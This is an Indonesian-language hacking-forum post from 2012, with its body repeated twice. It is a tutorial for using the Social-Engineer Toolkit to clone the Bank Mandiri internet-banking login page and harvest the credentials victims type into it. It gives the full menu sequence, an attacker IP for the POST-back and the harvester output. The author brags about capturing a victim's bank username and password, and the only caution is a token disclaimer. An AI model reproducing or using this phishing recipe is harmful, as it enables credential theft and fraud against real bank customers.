08-23-2012, 11:22 PM
ok sebelumnya ane mo ucapin MinalAidinwalfaidzin yah buat semua penghuni indonesian backtrack semoga semakin ganteng dan apa adanya hahaha
oke sesuai judul nih ane mo berbagi cara soceng dari SET membuat fakelogin bank mandiri kali ini hahaha just for share
oke tools yg dibutuhkan
1. Doa
2. Backtrack 5R3
3. SET
4. wifi
oke pertama baca doa semoga berhasil
kedua kitabuka setnya
bt@xsan-lahci:~# cd /pentest/exploits/set/
bt@xsan-lahci:/pentest/exploits/set# ./set
nanti ada pilihan kaya gini
Do you agree to the terms of service [y/n]: y
terus terbuka deh pilihannya kaya gini
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1 <------------ pilih no 1
terus terbuka lagi kaya gini
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2 <------ pilih no 2
oke next terbuka pilihan kaya gini
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192.168.1.102 <--- isikan ip attacker
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://ib.bankmandiri.co.id <------- isikan website yg akan dibuat fakelogin
tunggu beberapa saat nanti akan keluar tulisan seperti ini
[*] Cloning the website: https://ib.bankmandiri.co.id
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.
Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
oke perhatingan deh bro tulisan warna biru di atas,itu adalah proses dimana sebuah fakelogin berjalan pada port 80 dimana itu adalah service http
automatic fakelogin telah dibuatkan oleh tools set kita kembali ke pembahasan
lihat gambar di atas perhatikan deh baris paling bawah si victim nampaknya mulai mengakses site cloningan kita tuh hahaha
binggo checkthis out hahaha
i got username and password hahaha login bank mandiri
note : tested on blackberry phone punya om zasad
oke sekian dl ya tutorial cupu ane just for share dont use for blackhat job
thanks to om zasad , ares , cassaprodigy , zee eichel , dan om wildhanovsky
saatnya prepare pindahan markas
oke sesuai judul nih ane mo berbagi cara soceng dari SET membuat fakelogin bank mandiri kali ini hahaha just for share
oke tools yg dibutuhkan
1. Doa
2. Backtrack 5R3
3. SET
4. wifi
oke pertama baca doa semoga berhasil
kedua kitabuka setnya
bt@xsan-lahci:~# cd /pentest/exploits/set/
bt@xsan-lahci:/pentest/exploits/set# ./set
nanti ada pilihan kaya gini
Do you agree to the terms of service [y/n]: y
terus terbuka deh pilihannya kaya gini
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1 <------------ pilih no 1
terus terbuka lagi kaya gini
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2 <------ pilih no 2
oke next terbuka pilihan kaya gini
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192.168.1.102 <--- isikan ip attacker
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://ib.bankmandiri.co.id <------- isikan website yg akan dibuat fakelogin
tunggu beberapa saat nanti akan keluar tulisan seperti ini
[*] Cloning the website: https://ib.bankmandiri.co.id
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.
Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
oke perhatingan deh bro tulisan warna biru di atas,itu adalah proses dimana sebuah fakelogin berjalan pada port 80 dimana itu adalah service http
automatic fakelogin telah dibuatkan oleh tools set kita kembali ke pembahasan
lihat gambar di atas perhatikan deh baris paling bawah si victim nampaknya mulai mengakses site cloningan kita tuh hahaha
binggo checkthis out hahaha
i got username and password hahaha login bank mandiri
note : tested on blackberry phone punya om zasad
oke sekian dl ya tutorial cupu ane just for share dont use for blackhat job
thanks to om zasad , ares , cassaprodigy , zee eichel , dan om wildhanovsky
saatnya prepare pindahan markas
visit > https://xsanlahci.wordpress.com
All My Thread > http://indonesianbacktrack.or.id/forum/s...bd179f046e
All My Thread > http://indonesianbacktrack.or.id/forum/s...bd179f046e